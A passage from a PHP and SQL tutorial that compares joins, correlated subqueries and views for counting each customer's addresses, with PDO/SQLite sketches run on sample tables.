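To see the join and subquery forms side by side, here is a minimal sketch that runs both counting statements and then the NOT EXISTS delete against a tiny data set. It is an illustration under stated assumptions rather than code from the article: PDO with in-memory SQLite replaces the PEAR DB handle, the tables are cut down to the columns the queries need, and the two sample customers are hypothetical. One detail worth watching in the output is that the join form lists only customers with at least one address, while the subquery form lists every customer and reports 0 where there are none.

```php
<?php
// Sketch only: PDO/SQLite stands in for PEAR DB; the data is hypothetical.
$dbh = new PDO('sqlite::memory:');
$dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$dbh->exec('CREATE TABLE CUSTOMER (CUSTOMER_ID INTEGER PRIMARY KEY, LAST_NAME TEXT)');
$dbh->exec('CREATE TABLE ADDRESS (ADDRESS_ID INTEGER PRIMARY KEY, CUSTOMER_ID INTEGER, CITY TEXT)');

// Customer 1 has two addresses, customer 2 has none.
$dbh->exec("INSERT INTO CUSTOMER VALUES (1, 'Alpha')");
$dbh->exec("INSERT INTO CUSTOMER VALUES (2, 'Beta')");
$dbh->exec("INSERT INTO ADDRESS VALUES (1, 1, 'Zagreb')");
$dbh->exec("INSERT INTO ADDRESS VALUES (2, 1, 'Split')");

// Join + GROUP BY: only customers that have a matching ADDRESS row appear.
$joinSql = 'SELECT CUSTOMER.CUSTOMER_ID, COUNT(*) AS NO_OF_ADDRESSES
            FROM CUSTOMER, ADDRESS
            WHERE CUSTOMER.CUSTOMER_ID = ADDRESS.CUSTOMER_ID
            GROUP BY CUSTOMER.CUSTOMER_ID';

// Correlated subquery: every customer appears, with 0 when there are no addresses.
$subSql = 'SELECT CUSTOMER.CUSTOMER_ID,
                  (SELECT COUNT(*) FROM ADDRESS
                   WHERE CUSTOMER.CUSTOMER_ID = ADDRESS.CUSTOMER_ID) AS NO_OF_ADDRESSES
           FROM CUSTOMER
           ORDER BY CUSTOMER.CUSTOMER_ID';

// FETCH_KEY_PAIR turns two-column rows into an array of CUSTOMER_ID => count.
$joinCounts = array_map('intval', $dbh->query($joinSql)->fetchAll(PDO::FETCH_KEY_PAIR));
$subCounts  = array_map('intval', $dbh->query($subSql)->fetchAll(PDO::FETCH_KEY_PAIR));

// Remove customers without addresses in a single statement.
$deleted = $dbh->exec('DELETE FROM CUSTOMER
                       WHERE NOT EXISTS (
                           SELECT CUSTOMER_ID FROM ADDRESS
                           WHERE CUSTOMER.CUSTOMER_ID = ADDRESS.CUSTOMER_ID)');

print_r($joinCounts);
print_r($subCounts);
echo "Deleted $deleted customer(s)\n";
```

Whether the subquery form is actually faster than the grouped join depends on the database server and its optimizer, so it is worth timing both against your own data.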
If your statements are complex, the use of subqueries can often help with their simplification. This is not to say that there are not good reasons to use each of these other methods. Depending on the SQL statement’s complexity, the number of joined tables, and the amount of data processed, each method will act differently.

Views

A view is a virtual table which does not physically exist. It is defined as a query on one or more tables and stored in the database definition as an SQL statement. You can do any kind of SELECT from a view, and use it in any SQL statement just as you would any physical table. Views can sometimes be updated and deleted from, but whether a view is updateable or not depends on the complexity of its SQL definition and join conditions. Views can be created, altered, or dropped just like regular tables.

Let’s return to our problem of counting a customer’s addresses from table ADDRESS. Instead of doing a subquery or creating a temporary table to hold the counts of all addresses for each customer, we could simply create a view like this one:

CREATE VIEW CUSTOMER_ADDRESS_COUNT AS
SELECT CUSTOMER_ID, COUNT(*) AS NO_OF_ADDRESSES
FROM ADDRESS
GROUP BY CUSTOMER_ID
We have defined a virtual table named CUSTOMER_ADDRESS_COUNT, which contains one row for each customer that has at least one address, with that customer’s addresses counted in field NO_OF_ADDRESSES. Now we can select data from the view by issuing a statement like

SELECT * FROM CUSTOMER_ADDRESS_COUNT
We will get a set of rows containing CUSTOMER_ID and NO_OF_ADDRESSES for each customer that has addresses, just like we did with the previous SQL statement that used a join. Having this view defined, we could now repeat our address count check from Listing 1, avoiding the $query_check_address SQL statement. Better than that, our main query can be changed so that it returns only customers with no addresses. Because the view is built from the ADDRESS table alone, such customers never appear in it, so rather than testing for NO_OF_ADDRESSES = 0 we look for customers that have no matching row in the view:

SELECT CUSTOMER.*
FROM CUSTOMER
LEFT JOIN CUSTOMER_ADDRESS_COUNT
    ON CUSTOMER.CUSTOMER_ID = CUSTOMER_ADDRESS_COUNT.CUSTOMER_ID
WHERE CUSTOMER_ADDRESS_COUNT.CUSTOMER_ID IS NULL
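The view can be tried out with a short sketch like the one below. As before, this is an illustration and not the article's own code: PDO with in-memory SQLite replaces the PEAR DB handle, the tables are reduced to the columns involved, and the sample rows are hypothetical. It creates CUSTOMER_ADDRESS_COUNT, reads it back, and then uses a LEFT JOIN against the view to find customers with no addresses; since the view is built from ADDRESS alone, those customers have no row in it at all.

```php
<?php
// Sketch only: PDO/SQLite stands in for PEAR DB; the data is hypothetical.
$dbh = new PDO('sqlite::memory:');
$dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$dbh->exec('CREATE TABLE CUSTOMER (CUSTOMER_ID INTEGER PRIMARY KEY, LAST_NAME TEXT)');
$dbh->exec('CREATE TABLE ADDRESS (ADDRESS_ID INTEGER PRIMARY KEY, CUSTOMER_ID INTEGER, CITY TEXT)');

// Customer 1 has two addresses, customer 2 has none.
$dbh->exec("INSERT INTO CUSTOMER VALUES (1, 'Alpha')");
$dbh->exec("INSERT INTO CUSTOMER VALUES (2, 'Beta')");
$dbh->exec("INSERT INTO ADDRESS VALUES (1, 1, 'Zagreb')");
$dbh->exec("INSERT INTO ADDRESS VALUES (2, 1, 'Split')");

// The view stores only the query; its rows are computed when it is selected from.
$dbh->exec('CREATE VIEW CUSTOMER_ADDRESS_COUNT AS
            SELECT CUSTOMER_ID, COUNT(*) AS NO_OF_ADDRESSES
            FROM ADDRESS
            GROUP BY CUSTOMER_ID');

// Read the view like a table: CUSTOMER_ID => NO_OF_ADDRESSES.
$viewRows = array_map('intval', $dbh->query(
    'SELECT CUSTOMER_ID, NO_OF_ADDRESSES FROM CUSTOMER_ADDRESS_COUNT ORDER BY CUSTOMER_ID'
)->fetchAll(PDO::FETCH_KEY_PAIR));

// Customers with no row in the view are the ones without addresses.
$withoutAddress = array_map('intval', $dbh->query(
    'SELECT CUSTOMER.CUSTOMER_ID
     FROM CUSTOMER
     LEFT JOIN CUSTOMER_ADDRESS_COUNT
         ON CUSTOMER.CUSTOMER_ID = CUSTOMER_ADDRESS_COUNT.CUSTOMER_ID
     WHERE CUSTOMER_ADDRESS_COUNT.CUSTOMER_ID IS NULL
     ORDER BY CUSTOMER.CUSTOMER_ID'
)->fetchAll(PDO::FETCH_COLUMN));

print_r($viewRows);
print_r($withoutAddress);
```

An alternative would be to define the view over CUSTOMER with an outer join to ADDRESS, so that every customer gets a row and a count of 0 becomes possible; which form is preferable depends on how the view will be used.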
Listing 2 1
Listing 3 1